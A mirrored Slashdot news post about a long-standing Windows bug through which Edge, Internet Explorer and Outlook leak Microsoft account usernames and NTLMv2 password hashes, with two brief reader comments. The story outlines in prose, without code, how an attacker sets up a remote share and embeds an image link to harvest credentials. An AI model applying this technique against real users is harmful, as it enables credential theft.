Slashdot Mirror

← Back to Stories (view on slashdot.org)

Microsoft Live Account Credentials Leaking From Windows 8 And Above (hackaday.com)

Posted by msmash on from the security-blues dept.

An anonymous reader writes: Discovered in 1997 by Aaron Spangler and never fixed, the WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4) is certainly an excellent vintage. In Windows 8 and 10, the same bug has now been found to potentially leak the user's Microsoft Live account login and (hashed) password information, which is also used to access OneDrive, Outlook, Office, Mobile, Bing, Xbox Live, MSN and Skype (if used with a Microsoft account). The bug itself seems to be present in all Windows systems since Windows 95 / NT, although only Windows 8 and above are effectively compromised. To see if your machine is affected, you may want to check the public demonstration of the exploit, set up by the guys from [Perfect Privacy] and based on [VladikSS] original work. Basically, the default User Authentification Settings of Edge/Spartan (also Internet Explorer, Outlook) lets the browser connect to local network shares, but erroneously fail to block connections to remote shares. To exploit this, an attacker would simply set up a network share. An embedded image link that points to that network share is then sent to the victim, for example as part of an email or website. As soon as the prepped content is viewed inside a Microsoft product such as Edge/Spartan, Internet Explorer or Outlook, that software will try to connect to that share in order to download the image. Doing so, it will silently send the user's Windows login username in plaintext along with the NTLMv2 hash of the login password to the attacker's network share.

2 of 55 comments (clear)

  1. Re:So that's what it does? by Zak3056 · · Score: 4, Insightful

    It was a great workaround back before active directory. If you didn't have access to a share, just figure out the owner's username (pre-populated on their lock screen), and create a new local user on your machine with the same username, connect to the share as that user, done.

    That workaround doesn't work... the password has to match as well.

    --
    What part of "shall not be infringed" is so hard to understand?
  2. Re:That's the problem. It's internet, Windows thin by NotInHere · · Score: 3, Insightful

    I'd prefer if it didn't do much distinction. One compromised device inside a local network shouldn't be enough to escalate it to control every device inside. If you trust devices on a basis "its in our network", then you are doing something wrong.